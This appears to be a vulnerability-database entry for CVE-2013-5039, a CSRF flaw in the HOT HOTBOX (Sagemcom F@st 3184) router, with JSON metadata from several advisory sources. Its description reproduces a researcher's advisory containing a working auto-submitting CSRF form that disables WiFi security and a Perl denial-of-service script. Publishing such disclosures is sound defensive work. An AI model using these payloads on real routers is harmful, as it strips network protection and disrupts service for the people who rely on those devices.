VAR-201312-0133

Vulnerability from variot - Updated: 2023-12-18 12:21

Cross-site request forgery (CSRF) vulnerability in goform/wlanBasicSecurity on the HOT HOTBOX router with software 2.1.11 allows remote attackers to hijack the authentication of administrators for requests that change the WiFi Security field to Deactivated via the WifiSecurity parameter. HOT HOTBOX router is a router device. Such as changing the WIFI security field. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities: 1. An Information-disclosure Vulnerability 2. An Authentication-bypass vulnerability 3. A Remote Denial-of-service Vulnerability 4. A Directory-traversal Vulnerability 5. An HTML-injection Vulnerability 6. A Cross-site Request-forgery Vulnerability An attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible Sagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+ | HOTBOX is the leading router/modem appliance of | | HOT Cable communication company in israel. | | The Appliance is manufactured by SAGEMCOM | | and carries the model name F@st 3184. | +------------------------------------------------------------------------------+ | Title: HOTBOX Multiple Vulnerabilities | +--------------------+---------------------------------------------------------+ | Release Date | 2013/09/09 | | Researcher | Oz Elisyan | +--------------------+---------------------------------------------------------+ | System Affected | HOTBOX Router/Modem | | Versions Affected | 2.1.11 , possibly earlier | | Related CVE Numbers | CVE-2013-5037, CVE-2013-5038| | CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, | | CVE-2013-5039 | | Vendor Patched | N/A | | Classification | 0-day | | Exploits | http://elisyan.com/hotboxDoS.pl, | | http://elisyan.com/hotboxCSRF.html | +--------------------+---------------------------------------------------------+

Vulnerabilities List -

Default WPS Pin

Authentication based on IP Address

DoS via crafted POST

Path/Directory Traversal

Script injection via DHCP request

No CSRF Token

Demo - http://www.youtube.com/watch?v=CPlT09ZIj48

CSRF EXPLOIT:

document.getElementById(1).submit();

DENIAL OF SERVICE EXPLOIT:

use warnings; use HTTP::Request::Common qw(POST); use LWP::UserAgent;

Author: Oz Elisyan

Date: 3 September 2013

Affected Version: <= 2.1.11

print "# HOTBOX DoS PoC #\n\n"

unless ($ARGV[0]){ print "Please Enter Valid Host Name.\n"; exit(); }

print "Sending Evil POST request...\n";

my $HOST = $ARGV[0]; my $URL = "http://$HOST/goform/login"; my $PostData = "loginUsername=aaaloginPassword=aaa" my $browser = LWP::UserAgent->new(); my $req = HTTP::Request->new(POST => $URL); $req->content_type("application/x-www-form-urlencoded"); $req->content($PostData); my $resp = $browser->request($req);

print "Done.";

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201312-0133",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "hotbox router",
        "scope": "eq",
        "trust": 3.0,
        "vendor": "hot",
        "version": "2.1.11"
      },
      {
        "model": "hotbox router",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "hot",
        "version": null
      },
      {
        "model": "hotbox router",
        "scope": null,
        "trust": 0.8,
        "vendor": "hot",
        "version": null
      },
      {
        "model": "f@st router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sagecom",
        "version": "31842.1.11"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-00017"
      },
      {
        "db": "BID",
        "id": "63550"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005733"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5039"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-562"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:hot:hotbox_router_firmware:2.1.11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:hot:hotbox_router:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-5039"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Oz Elisyan",
    "sources": [
      {
        "db": "BID",
        "id": "63550"
      },
      {
        "db": "PACKETSTORM",
        "id": "123901"
      }
    ],
    "trust": 0.4
  },
  "cve": "CVE-2013-5039",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.4,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 5.5,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:A/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Adjacent Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 5.4,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2013-5039",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:A/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.4,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 5.5,
            "id": "CNVD-2014-00017",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:A/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.4,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 5.5,
            "id": "VHN-65041",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:A/AC:M/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2013-5039",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2014-00017",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201312-562",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-65041",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-00017"
      },
      {
        "db": "VULHUB",
        "id": "VHN-65041"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005733"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5039"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-562"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cross-site request forgery (CSRF) vulnerability in goform/wlanBasicSecurity on the HOT HOTBOX router with software 2.1.11 allows remote attackers to hijack the authentication of administrators for requests that change the WiFi Security field to Deactivated via the WifiSecurity parameter. HOT HOTBOX router is a router device. Such as changing the WIFI security field. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities:\n1. An Information-disclosure Vulnerability\n2. An Authentication-bypass vulnerability\n3. A Remote Denial-of-service Vulnerability\n4. A Directory-traversal Vulnerability\n5. An HTML-injection Vulnerability\n6. A Cross-site Request-forgery Vulnerability\nAn attacker can exploit these issues to  gain access to potentially  sensitive information, bypass certain security restrictions to perform  unauthorized  actions, steal cookie-based authentication credentials and  gain access to system. Other attacks are also possible\nSagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+\n| HOTBOX is the leading router/modem appliance of      |\n|  HOT Cable communication company in israel.           |\n| The Appliance is manufactured by SAGEMCOM         |\n| and carries the model name F@st 3184.                     |\n+------------------------------------------------------------------------------+\n| Title: HOTBOX Multiple Vulnerabilities                         |\n+--------------------+---------------------------------------------------------+\n| Release Date       | 2013/09/09                                    |\n| Researcher         | Oz Elisyan                                     |\n+--------------------+---------------------------------------------------------+\n| System Affected    | HOTBOX Router/Modem               |\n| Versions Affected  | 2.1.11 , possibly earlier                 |\n| Related CVE Numbers | CVE-2013-5037, CVE-2013-5038|\n| CVE-2013-5220, CVE-2013-5219, CVE-2013-5218,       |\n| CVE-2013-5039                                                         |\n| Vendor Patched | N/A                                                 |\n| Classification     | 0-day                                              |\n| Exploits | http://elisyan.com/hotboxDoS.pl,                  |\n| http://elisyan.com/hotboxCSRF.html                           |\n+--------------------+---------------------------------------------------------+\n\nVulnerabilities List -\n# Default WPS Pin\n# Authentication based on IP Address\n# DoS via crafted POST\n# Path/Directory Traversal\n# Script injection via DHCP request\n# No CSRF Token\n\nDemo -\nhttp://www.youtube.com/watch?v=CPlT09ZIj48\n\n\n\nCSRF EXPLOIT: \n\n\n\u003chtml\u003e\n    \u003cform action=\u0027http://192.168.1.1/goform/wlanBasicSecurity\u0027 method=\u0027POST\u0027 id=1\u003e\n        \u003cinput type=hidden name=\"WirelessMacAddr\" value=\"C0%3AAC%3A54%3AF8%3A67%3A58\" id=\"WirelessMacAddr\"\u003e\n        \u003cinput type=hidden name=\"WirelessEnable1\" value=\"1\" id=\"WirelessEnable1\"\u003e\n\t\t\u003cinput type=hidden name=\"ServiceSetIdentifier1\" value=\"Elisyan\" id=\"ServiceSetIdentifier1\"\u003e\n\t\t\u003cinput type=hidden name=\"WirelessVendorMode\" value=\"3\" id=\"WirelessVendorMode\"\u003e\n\t\t\u003cinput type=hidden name=\"ChannelNumber1\" value=\"0\" id=\"ChannelNumber1\"\u003e\n\t\t\u003cinput type=hidden name=\"NBandwidth1\" value=\"20\" id=\"NBandwidth1\"\u003e\n\t\t\u003cinput type=hidden name=\"ClosedNetwork1\" value=\"0\" id=\"ClosedNetwork1\"\u003e\n\t\t\u003cinput type=hidden name=\"WifiSecurity\" value=\"0\" id=\"WifiSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"commitwlanBasicSecurity\" value=\"1\" id=\"commitwlanBasicSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"restoreWirelessDefaults1\" value=\"0\" id=\"restoreWirelessDefaults1\"\u003e\n\t\t\u003cinput type=hidden name=\"scanActions1\" value=\"0\" id=\"scanActions1\"\u003e\n\t\t\u003cinput type=hidden name=\"AutoSecurity1\" value=\"1\" id=\"AutoSecurity1\"\u003e\n\t\t\u003cinput type=hidden name=\"wpsActions1\" value=\"0\" id=\"wpsActions1\"\u003e\n\t\t\n\n    \u003c/form\u003e\n\u003c/html\u003e\n\u003cscript\u003edocument.getElementById(1).submit();\u003c/script\u003e\n\n\n\nDENIAL OF SERVICE EXPLOIT:\n\nuse warnings;\nuse HTTP::Request::Common qw(POST);\nuse LWP::UserAgent;\n\n\n# Author: Oz Elisyan\n# Date: 3 September 2013\n# Affected Version: \u003c= 2.1.11\n\nprint \"# HOTBOX DoS PoC #\\n\\n\"\n\nunless ($ARGV[0]){\n\tprint \"Please Enter Valid Host Name.\\n\";\n\texit();\n}\n\nprint \"Sending Evil POST request...\\n\";\n\nmy $HOST = $ARGV[0];\nmy $URL = \"http://$HOST/goform/login\";\nmy $PostData = \"loginUsername=aaaloginPassword=aaa\"\nmy $browser = LWP::UserAgent-\u003enew();\nmy $req = HTTP::Request-\u003enew(POST =\u003e $URL);\n$req-\u003econtent_type(\"application/x-www-form-urlencoded\");\n$req-\u003econtent($PostData);\nmy $resp = $browser-\u003erequest($req);\n\nprint \"Done.\";\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-5039"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005733"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-00017"
      },
      {
        "db": "BID",
        "id": "63550"
      },
      {
        "db": "VULHUB",
        "id": "VHN-65041"
      },
      {
        "db": "PACKETSTORM",
        "id": "123901"
      }
    ],
    "trust": 2.61
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-65041",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-65041"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-5039",
        "trust": 3.5
      },
      {
        "db": "PACKETSTORM",
        "id": "123901",
        "trust": 3.2
      },
      {
        "db": "BID",
        "id": "63550",
        "trust": 0.9
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005733",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-562",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-00017",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "29518",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-65041",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-00017"
      },
      {
        "db": "VULHUB",
        "id": "VHN-65041"
      },
      {
        "db": "BID",
        "id": "63550"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005733"
      },
      {
        "db": "PACKETSTORM",
        "id": "123901"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5039"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-562"
      }
    ]
  },
  "id": "VAR-201312-0133",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-00017"
      },
      {
        "db": "VULHUB",
        "id": "VHN-65041"
      }
    ],
    "trust": 1.325
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-00017"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:21:32.677000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.hot.net.il/heb/main/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005733"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-352",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-65041"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005733"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5039"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.1,
        "url": "http://packetstormsecurity.com/files/123901/hotbox-2.1.11-csrf-traversal-denial-of-service.html"
      },
      {
        "trust": 2.4,
        "url": "http://www.youtube.com/watch?v=cplt09zij48"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5039"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5039"
      },
      {
        "trust": 0.3,
        "url": "http://www.sagemcom.com/index.php?id=1760\u0026l=25"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/fulldisclosure/2013/nov/17"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5038"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5220"
      },
      {
        "trust": 0.1,
        "url": "http://$host/goform/login\";"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/goform/wlanbasicsecurity\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5037"
      },
      {
        "trust": 0.1,
        "url": "http://elisyan.com/hotboxcsrf.html"
      },
      {
        "trust": 0.1,
        "url": "http://elisyan.com/hotboxdos.pl,"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5039"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5219"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5218"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-00017"
      },
      {
        "db": "VULHUB",
        "id": "VHN-65041"
      },
      {
        "db": "BID",
        "id": "63550"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005733"
      },
      {
        "db": "PACKETSTORM",
        "id": "123901"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5039"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-562"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-00017"
      },
      {
        "db": "VULHUB",
        "id": "VHN-65041"
      },
      {
        "db": "BID",
        "id": "63550"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005733"
      },
      {
        "db": "PACKETSTORM",
        "id": "123901"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5039"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-562"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-01-02T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2014-00017"
      },
      {
        "date": "2013-12-30T00:00:00",
        "db": "VULHUB",
        "id": "VHN-65041"
      },
      {
        "date": "2013-09-09T00:00:00",
        "db": "BID",
        "id": "63550"
      },
      {
        "date": "2014-01-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-005733"
      },
      {
        "date": "2013-11-04T13:03:33",
        "db": "PACKETSTORM",
        "id": "123901"
      },
      {
        "date": "2013-12-30T04:53:07.193000",
        "db": "NVD",
        "id": "CVE-2013-5039"
      },
      {
        "date": "2013-12-31T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-562"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-01-02T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2014-00017"
      },
      {
        "date": "2013-12-30T00:00:00",
        "db": "VULHUB",
        "id": "VHN-65041"
      },
      {
        "date": "2013-09-09T00:00:00",
        "db": "BID",
        "id": "63550"
      },
      {
        "date": "2014-01-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-005733"
      },
      {
        "date": "2013-12-30T19:25:06.157000",
        "db": "NVD",
        "id": "CVE-2013-5039"
      },
      {
        "date": "2013-12-31T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-562"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "specific network environment",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-562"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "HOT HOTBOX Router Software  goform/wlanBasicSecurity Vulnerable to cross-site request forgery",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005733"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "cross-site request forgery",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-562"
      }
    ],
    "trust": 0.6
  }
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…